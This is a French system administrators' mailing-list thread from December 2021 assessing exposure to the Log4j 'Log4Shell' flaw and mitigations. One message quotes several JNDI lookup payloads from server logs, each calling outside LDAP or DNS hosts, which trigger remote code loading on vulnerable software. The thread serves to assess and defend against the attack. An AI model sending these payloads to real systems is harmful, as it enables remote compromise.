Bonjour,
Même approche (estimer la portée réelle de la menace avant de s'affoler) et même constat : cette "faille" rejoint la liste des appels à la panique inutiles, du moins pour ce qui me concerne.
Je relève une centaine "d'attaques" (avant blocage automatique), toutes depuis le 10/12/21 sur les Url :
${jndi:ldap://152.89.239.12:1389/bt2f6m} /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D /$%7Bjndi:ldap://167.71.13.196:2222/lx-ffff33fe1d7bbb0100fee1b661000000001ef879%7D /${jndi:dns:/45.83.64.1/securityscan-http80} /${jndi:dns:/45.83.64.1/securityscan-https443} /${jndi:ldap:/45.130.229.168:1389/Exploit} /${jndi:ldap:/45.83.193.150:1389/Exploit} /${jndi:ldaps:/a5384.probe001.log4j.leakix.net:8443/b}
qui retournent un 400, 403 ou 404 sur les quelques serveurs que je gère.
A noter que plus de 60% de ces attaques proviennent de 45.83.64.0/32 (Internet Security Research Project), ce qui conforte la suggestion de Maxime à propos des conflits d'intérêt de la part des acteurs œuvrant officiellement pour la lutte contre les pirates.
Cordialement,
Laurent Barme
Le 14/12/2021 à 09:02, Julien Escario a écrit :
Bonjour,
Tentons de reprendre le cours normal de ce thread : j'ai passé la journée d'hier à tenter d'exploiter la faille sur des trucs 'legacy' justement un peu partout et j'ai été très surpris de la faible surface d'attaque que nous avons par rapport aux cris d’orfraies que j'ai pu lire et ici là.
Alors, on a très peu de trucs en Java, langage que je fuis depuis quelques années déjà par respect pour la RAM de mes machines mais en gros, à part Graylog, rien vu à mettre à jour en urgence.
Zimbra, pas touché Puppet, pas touché Big Blue Button, pas touché
Unifi est touché à priori mais je n'ai pas réussi à l'exploiter avant de passer -Dlog4j2.formatMsgNoLookups=true
Si quelqu'un veut un test d'exploitation sur un service vulnérable, j'ai un bout de script qui se contente de faire un 'touch /tmp/pwned'
Bonne journée,
Julien
Le 13/12/2021 à 15:18, Seb Astien a écrit :
Qui n'a plus de legacy de nos jours ?
Le lun. 13 déc. 2021 à 14:54, Vincent Habchi <vincent@geomag.fr mailto:vincent@geomag.fr> a écrit :
> On 13 Dec 2021, at 13:18, David Ponzone <david.ponzone@gmail.com <mailto:david.ponzone@gmail.com>> wrote: > > Pour ceux qui l’auraient raté: Qui utilise encore Apache de nos jours ? V. _______________________________________________ Liste de diffusion du FRsAG http://www.frsag.org/
Liste de diffusion du FRsAG http://www.frsag.org/
Liste de diffusion du FRsAG http://www.frsag.org/